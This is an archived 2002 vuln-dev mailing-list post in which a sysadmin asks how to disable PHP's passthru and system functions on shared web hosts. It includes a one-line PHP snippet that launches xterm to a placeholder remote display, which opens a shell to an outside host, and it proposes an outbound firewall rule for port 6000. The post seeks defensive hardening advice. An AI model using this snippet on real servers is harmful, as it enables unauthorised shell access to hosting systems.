php & passthru & system

From: Evrim ULU (evrim@envy.com.tr)
Date: 04/23/02


Date: Tue, 23 Apr 2002 11:15:22 +0300
From: Evrim ULU <evrim@envy.com.tr>
To: vuln-dev@security-focus.com

hi,

i was wondering if there is a way to disable the passthru and system
functions in php easily.

There are a lot of webhosting firms serving php with ftp accounts and
i've seen that if their firewall is not configured properly i can open a
xterm with my user priviledges.

<?
passthru("`which xterm` --display=my_ip:0.0");
?>

same thing for system is also valid of course.

Abusing the system after having the shell access is easy. Most of the
sysadms do not patch the system since nobody have a valid shell access.

Is there an easy way to disable these function before compilation&after
compliation and any firewall rules like -A OUTPUT -p tcp
--destination-port 6000 -j DROP?

thnx.

-- 
Evrim ULU
evrim@envy.com.tr / evrim@core.gen.tr
sysadm
http://www.core.gen.tr